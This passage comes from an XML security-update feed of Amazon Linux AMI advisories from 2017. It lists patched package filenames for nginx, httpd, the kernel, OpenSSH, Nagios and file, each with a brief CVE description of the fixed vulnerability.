arch="x86_64"><filename>Packages/nginx-mod-stream-1.12.1-1.32.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-xslt-filter" version="1.12.1" release="1.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-xslt-filter-1.12.1-1.32.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-image-filter" version="1.12.1" release="1.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-image-filter-1.12.1-1.32.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-perl" version="1.12.1" release="1.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-perl-1.12.1-1.32.amzn1.x86_64.rpm</filename></package><package name="nginx-all-modules" version="1.12.1" release="1.32.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-all-modules-1.12.1-1.32.amzn1.i686.rpm</filename></package><package name="nginx" version="1.12.1" release="1.32.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-1.12.1-1.32.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-geoip" version="1.12.1" release="1.32.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-geoip-1.12.1-1.32.amzn1.i686.rpm</filename></package><package name="nginx-mod-mail" version="1.12.1" release="1.32.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-mail-1.12.1-1.32.amzn1.i686.rpm</filename></package><package name="nginx-debuginfo" version="1.12.1" release="1.32.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-debuginfo-1.12.1-1.32.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-xslt-filter" version="1.12.1" release="1.32.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-xslt-filter-1.12.1-1.32.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-perl" version="1.12.1" release="1.32.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-perl-1.12.1-1.32.amzn1.i686.rpm</filename></package><package name="nginx-mod-stream" version="1.12.1" release="1.32.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-stream-1.12.1-1.32.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-image-filter" version="1.12.1" release="1.32.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-image-filter-1.12.1-1.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-895</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-895: important priority package update for aws-cfn-bootstrap</title><issued date="2017-09-14 17:08:00" /><updated date="2017-09-14 22:32:00" /><severity>important</severity><description /><references /><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="aws-cfn-bootstrap" version="1.4" release="22.14.amzn1" epoch="0" arch="noarch"><filename>Packages/aws-cfn-bootstrap-1.4-22.14.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-896</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-896: important priority package update for httpd24 httpd</title><issued date="2017-09-18 15:32:00" /><updated date="2017-09-18 18:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-9798:
Apache httpd allows remote attackers to read secret data from process memory if the Limit directive can be set in a user's .htaccess file, or if httpd.conf has certain misconfigurations, aka Optionsbleed. This affects the Apache HTTP Server through 2.2.34 and 2.4.x through 2.4.27. The attacker sends an unauthenticated OPTIONS HTTP request when attempting to read secret data. This is a use-after-free issue and thus secret data is not always sent, and the specific data depends on many factors including configuration. Exploitation with .htaccess can be blocked with a patch to the ap_limit_section function in server/core.c.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9798" title="" id="CVE-2017-9798" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd-tools" version="2.2.34" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-tools-2.2.34-1.15.amzn1.x86_64.rpm</filename></package><package name="httpd-devel" version="2.2.34" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-devel-2.2.34-1.15.amzn1.x86_64.rpm</filename></package><package name="httpd" version="2.2.34" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-2.2.34-1.15.amzn1.x86_64.rpm</filename></package><package name="mod_ssl" version="2.2.34" release="1.15.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod_ssl-2.2.34-1.15.amzn1.x86_64.rpm</filename></package><package name="httpd-manual" version="2.2.34" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd-manual-2.2.34-1.15.amzn1.noarch.rpm</filename></package><package name="httpd-debuginfo" version="2.2.34" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-debuginfo-2.2.34-1.15.amzn1.x86_64.rpm</filename></package><package name="httpd-tools" version="2.2.34" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-tools-2.2.34-1.15.amzn1.i686.rpm</filename></package><package name="httpd-devel" version="2.2.34" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-devel-2.2.34-1.15.amzn1.i686.rpm</filename></package><package name="mod_ssl" version="2.2.34" release="1.15.amzn1" epoch="1" arch="i686"><filename>Packages/mod_ssl-2.2.34-1.15.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.34" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-2.2.34-1.15.amzn1.i686.rpm</filename></package><package name="httpd-debuginfo" version="2.2.34" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-debuginfo-2.2.34-1.15.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.27" release="3.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.27-3.73.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.27" release="3.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.27-3.73.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.27" release="3.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.27-3.73.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.27" release="3.73.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.27-3.73.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.27" release="3.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.27-3.73.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.27" release="3.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.27-3.73.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.27" release="3.73.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.27-3.73.amzn1.noarch.rpm</filename></package><package name="mod24_ssl" version="2.4.27" release="3.73.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.27-3.73.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.27" release="3.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.27-3.73.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.27" release="3.73.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.27-3.73.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.27" release="3.73.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.27-3.73.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.27" release="3.73.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.27-3.73.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.27" release="3.73.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.27-3.73.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.27" release="3.73.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.27-3.73.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.27" release="3.73.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.27-3.73.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.27" release="3.73.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.27-3.73.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.27" release="3.73.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.27-3.73.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-897</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-897: medium priority package update for kernel</title><issued date="2017-09-18 15:41:00" /><updated date="2017-09-18 18:28:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-12134:
The xen_biovec_phys_mergeable function in drivers/xen/biomerge.c in Xen might allow local OS guest users to corrupt block device data streams and consequently obtain sensitive memory information, cause a denial of service, or gain host OS privileges by leveraging incorrect block IO merge-ability calculation.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12134" title="" id="CVE-2017-12134" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="4.9.43" release="17.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.43-17.39.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.9.43" release="17.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.43-17.39.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.43" release="17.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.43-17.39.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.43" release="17.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.43-17.39.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.9.43" release="17.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.43-17.39.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.43" release="17.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.43-17.39.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.43" release="17.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.43-17.39.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.43" release="17.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.43-17.39.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.9.43" release="17.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.43-17.39.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.9.43" release="17.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.9.43-17.39.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.43" release="17.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.43-17.39.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.9.43" release="17.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.43-17.39.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.9.43" release="17.39.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.43-17.39.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.43" release="17.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.43-17.39.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.43" release="17.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.43-17.39.amzn1.i686.rpm</filename></package><package name="perf" version="4.9.43" release="17.39.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.43-17.39.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.43" release="17.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.43-17.39.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.43" release="17.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.43-17.39.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.43" release="17.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.43-17.39.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.43" release="17.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.43-17.39.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.43" release="17.39.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.9.43-17.39.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-898</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-898: medium priority package update for openssh</title><issued date="2017-10-03 11:00:00" /><updated date="2017-10-03 11:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-6515:
It was found that OpenSSH did not limit password lengths for password authentication. A remote unauthenticated attacker could use this flaw to temporarily trigger high CPU consumption in sshd by sending long passwords.
1364935:
CVE-2016-6515 openssh: Denial of service via very long passwords
CVE-2016-6210:
A covert timing channel flaw was found in the way OpenSSH handled authentication of non-existent users. A remote unauthenticated attacker could possibly use this flaw to determine valid user names by measuring the timing of server responses.
1357442:
CVE-2016-6210 openssh: User enumeration via covert timing channel
CVE-2016-10012:
It was found that the boundary checks in the code implementing support for pre-authentication compression could have been optimized out by certain compilers. An attacker able to compromise the privilege-separated process could possibly use this flaw for further attacks against the privileged monitor process.
1406293:
CVE-2016-10012 openssh: Bounds check can be evaded in the shared memory manager used by pre-authentication compression support
CVE-2016-10011:
It was found that the host private key material could possibly leak to the privilege-separated child processes via re-allocated memory. An attacker able to compromise the privilege-separated process could therefore obtain the leaked key information.
1406286:
CVE-2016-10011 openssh: Leak of host private key material to privilege-separated child process via realloc()
CVE-2016-10009:
It was found that ssh-agent could load PKCS#11 modules from arbitrary paths. An attacker having control of the forwarded agent-socket on the server, and the ability to write to the filesystem of the client host, could use this flaw to execute arbitrary code with the privileges of the user running ssh-agent.
1406269:
CVE-2016-10009 openssh: loading of untrusted PKCS#11 modules in ssh-agent
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10009" title="" id="CVE-2016-10009" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10011" title="" id="CVE-2016-10011" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10012" title="" id="CVE-2016-10012" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6210" title="" id="CVE-2016-6210" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6515" title="" id="CVE-2016-6515" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssh-ldap" version="7.4p1" release="11.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-7.4p1-11.68.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="7.4p1" release="11.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-7.4p1-11.68.amzn1.x86_64.rpm</filename></package><package name="openssh" version="7.4p1" release="11.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-7.4p1-11.68.amzn1.x86_64.rpm</filename></package><package name="openssh-keycat" version="7.4p1" release="11.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-7.4p1-11.68.amzn1.x86_64.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.10.3" release="1.11.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.10.3-1.11.68.amzn1.x86_64.rpm</filename></package><package name="openssh-cavs" version="7.4p1" release="11.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-cavs-7.4p1-11.68.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" release="11.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-7.4p1-11.68.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="7.4p1" release="11.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-7.4p1-11.68.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="7.4p1" release="11.68.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-7.4p1-11.68.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.10.3" release="1.11.68.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.10.3-1.11.68.amzn1.i686.rpm</filename></package><package name="openssh-cavs" version="7.4p1" release="11.68.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-cavs-7.4p1-11.68.amzn1.i686.rpm</filename></package><package name="openssh" version="7.4p1" release="11.68.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-7.4p1-11.68.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" release="11.68.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-7.4p1-11.68.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="7.4p1" release="11.68.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-7.4p1-11.68.amzn1.i686.rpm</filename></package><package name="openssh-server" version="7.4p1" release="11.68.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-7.4p1-11.68.amzn1.i686.rpm</filename></package><package name="openssh-clients" version="7.4p1" release="11.68.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-7.4p1-11.68.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-899</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-899: important priority package update for nagios</title><issued date="2017-10-03 11:00:00" /><updated date="2017-10-03 11:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-9566:
A privilege escalation flaw was found in the way Nagios handled log files. An attacker able to control the Nagios logging configuration (the &#039;nagios&#039; user/group) could use this flaw to elevate their privileges to root.
1402869:
CVE-2016-9566 nagios: Privilege escalation issue
CVE-2014-5009:
Various command-execution flaws were found in the Snoopy library included with Nagios. These flaws allowed remote attackers to execute arbitrary commands by manipulating Nagios HTTP headers.
1121497:
CVE-2008-7313 CVE-2014-5008 CVE-2014-5009 snoopy: incomplete fixes for command execution flaws
CVE-2014-5008:
Various command-execution flaws were found in the Snoopy library included with Nagios. These flaws allowed remote attackers to execute arbitrary commands by manipulating Nagios HTTP headers.
1121497:
CVE-2008-7313 CVE-2014-5008 CVE-2014-5009 snoopy: incomplete fixes for command execution flaws
CVE-2014-1878:
Stack-based buffer overflow in the cmd_submitf function in cgi/cmd.c in Nagios Core, possibly 4.0.3rc1 and earlier, and Icinga before 1.8.6, 1.9 before 1.9.5, and 1.10 before 1.10.3 allows remote attackers to cause a denial of service (segmentation fault) via a long message to cmd.cgi.
1066578:
CVE-2014-1878 nagios: possible buffer overflows in cmd.cgi
CVE-2013-7205:
Off-by-one error in the process_cgivars function in contrib/daemonchk.c in Nagios Core 3.5.1, 4.0.2, and earlier allows remote authenticated users to obtain sensitive information from process memory or cause a denial of service (crash) via a long string in the last key value in the variable list, which triggers a heap-based buffer over-read.
1046113:
CVE-2013-7108 CVE-2013-7205 nagios: denial of service due to off-by-one flaw in process_cgivars()
CVE-2013-7108:
Multiple off-by-one errors in Nagios Core 3.5.1, 4.0.2, and earlier, and Icinga before 1.8.5, 1.9 before 1.9.4, and 1.10 before 1.10.2 allow remote authenticated users to obtain sensitive information from process memory or cause a denial of service (crash) via a long string in the last key value in the variable list to the process_cgivars function in (1) avail.c, (2) cmd.c, (3) config.c, (4) extinfo.c, (5) histogram.c, (6) notifications.c, (7) outages.c, (8) status.c, (9) statusmap.c, (10) summary.c, and (11) trends.c in cgi/, which triggers a heap-based buffer over-read.
1046113:
CVE-2013-7108 CVE-2013-7205 nagios: denial of service due to off-by-one flaw in process_cgivars()
CVE-2013-4214:
rss-newsfeed.php in Nagios Core 3.4.4, 3.5.1, and earlier, when MAGPIE_CACHE_ON is set to 1, allows local users to overwrite arbitrary files via a symlink attack on /tmp/magpie_cache.
958002:
CVE-2013-4214 Nagios core: html/rss-newsfeed.php insecure temporary file usage
CVE-2008-7313:
Various command-execution flaws were found in the Snoopy library included with Nagios. These flaws allowed remote attackers to execute arbitrary commands by manipulating Nagios HTTP headers.
1121497:
CVE-2008-7313 CVE-2014-5008 CVE-2014-5009 snoopy: incomplete fixes for command execution flaws
CVE-2008-4796:
The _httpsrequest function (Snoopy/Snoopy.class.php) in Snoopy 1.2.3 and earlier, as used in (1) ampache, (2) libphp-snoopy, (3) mahara, (4) mediamate, (5) opendb, (6) pixelpost, and possibly other products, allows remote attackers to execute arbitrary commands via shell metacharacters in https URLs.
469320:
CVE-2008-4796 snoopy: command execution via shell metacharacters
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4796" title="" id="CVE-2008-4796" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7313" title="" id="CVE-2008-7313" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4214" title="" id="CVE-2013-4214" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7108" title="" id="CVE-2013-7108" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7205" title="" id="CVE-2013-7205" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1878" title="" id="CVE-2014-1878" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5008" title="" id="CVE-2014-5008" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5009" title="" id="CVE-2014-5009" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9566" title="" id="CVE-2016-9566" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nagios" version="3.5.1" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/nagios-3.5.1-2.10.amzn1.x86_64.rpm</filename></package><package name="nagios-common" version="3.5.1" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/nagios-common-3.5.1-2.10.amzn1.x86_64.rpm</filename></package><package name="nagios-debuginfo" version="3.5.1" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/nagios-debuginfo-3.5.1-2.10.amzn1.x86_64.rpm</filename></package><package name="nagios-devel" version="3.5.1" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/nagios-devel-3.5.1-2.10.amzn1.x86_64.rpm</filename></package><package name="nagios-devel" version="3.5.1" release="2.10.amzn1" epoch="0" arch="i686"><filename>Packages/nagios-devel-3.5.1-2.10.amzn1.i686.rpm</filename></package><package name="nagios-common" version="3.5.1" release="2.10.amzn1" epoch="0" arch="i686"><filename>Packages/nagios-common-3.5.1-2.10.amzn1.i686.rpm</filename></package><package name="nagios-debuginfo" version="3.5.1" release="2.10.amzn1" epoch="0" arch="i686"><filename>Packages/nagios-debuginfo-3.5.1-2.10.amzn1.i686.rpm</filename></package><package name="nagios" version="3.5.1" release="2.10.amzn1" epoch="0" arch="i686"><filename>Packages/nagios-3.5.1-2.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-900</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-900: important priority package update for file</title><issued date="2017-10-03 11:00:00" /><updated date="2017-10-03 11:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-1000249:
An issue in file() was introduced in commit 9611f31313a93aa036389c5f3b15eea53510d4d1 (Oct 2016) lets an attacker overwrite a fixed 20 bytes stack buffer with a specially crafted .notes section in an ELF binary. This was fixed in commit 35c94dc6acc418f1ad7f6241a6680e5327495793 (Aug 2017).
1488053:
CVE-2017-1000249 file: Stack-based buffer overflow in do_bid_note()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000249" title="" id="CVE-2017-1000249" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="file-debuginfo" version="5.30" release="11.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-debuginfo-5.30-11.34.amzn1.x86_64.rpm</filename></package><package name="file" version="5.30" release="11.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-5.30-11.34.amzn1.x86_64.rpm</filename></package><package name="file-static" version="5.30" release="11.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-static-5.30-11.34.amzn1.x86_64.rpm</filename></package><package name="file-devel" version="5.30" release="11.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-devel-5.30-11.34.amzn1.x86_64.rpm</filename></package><package name="python27-magic" version="5.30" release="11.34.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-magic-5.30-11.34.amzn1.noarch.rpm</filename></package><package name="python26-magic" version="5.30" release="11.34.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-magic-5.30-11.34.amzn1.noarch.rpm</filename></package><package name="file-libs" version="5.30" release="11.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-libs-5.30-11.34.amzn1.x86_64.rpm</filename></package><package name="file-debuginfo" version="5.30" release="11.34.amzn1" epoch="0" arch="i686"><filename>Packages/file-debuginfo-5.30-11.34.amzn1.i686.rpm</filename></package><package name="file" version="5.30" release="11.34.amzn1" epoch="0" arch="i686"><filename>Packages/file-5.30-11.34.amzn1.i686.rpm</filename></package><package name="file-devel" version="5.30" release="11.34.amzn1" epoch="0" arch="i686"><filename>Packages/file-devel-5.30-11.34.amzn1.i686.rpm</filename></package><package name="file-libs" version="5.30" release="11.34.amzn1" epoch="0" arch="i686"><filename>Packages/file-libs-5.30-11.34.amzn1.i686.rpm</filename></package><package name="file-static" version="5.30" release="11.34.amzn1" epoch="0" arch="i686"><filename>Packages/file-static-5.30-11.34.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-901</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-901: medium priority package update for kernel</title><issued date="2017-10-03 11:00:00" /><updated date="2017-10-03 11:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7558:
A kernel data leak due to an out-of-bound read was found in the Linux kernel in inet_diag_msg_sctp{,l}addr_fill() and sctp_get_sctp_info() functions present since version 4.7-rc1 through version 4.13. A data leak happens when these functions fill in sockaddr data structures used to export socket&#039;s diagnostic information. As a result, up to 100 bytes of the slab data could be leaked to a userspace.
1480266:
CVE-2017-7558 kernel: Out of bounds read in inet_diag_msg_sctp{,l}addr_fill() and sctp_get_sctp_info() in SCTP stack
CVE-2017-14497:
A buffer overflow was discovered in tpacket_rcv() function in the Linux kernel since v4.6-rc1 through v4.13. A number of socket-related syscalls can be made to set up a configuration when each packet received by a network interface can cause writing up to 10 bytes to a kernel memory outside of a kernel buffer. This can cause unspecified kernel data corruption effects, including damage of in-memory and on-disk XFS data.
1492593:
CVE-2017-14497 kernel: buffer overflow in tpacket_rcv() in net/packet/af_packet.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14497" title="" id="CVE-2017-14497" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7558" title="" id="CVE-2017-7558" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.9.51" release="10.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.51-10.52.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.51" release="10.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.51-10.52.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.51" release="10.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.51-10.52.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.9.51" release="10.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.51-10.52.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.51" release="10.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.51-10.52.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.9.51" release="10.52.amzn1" epoch="0" 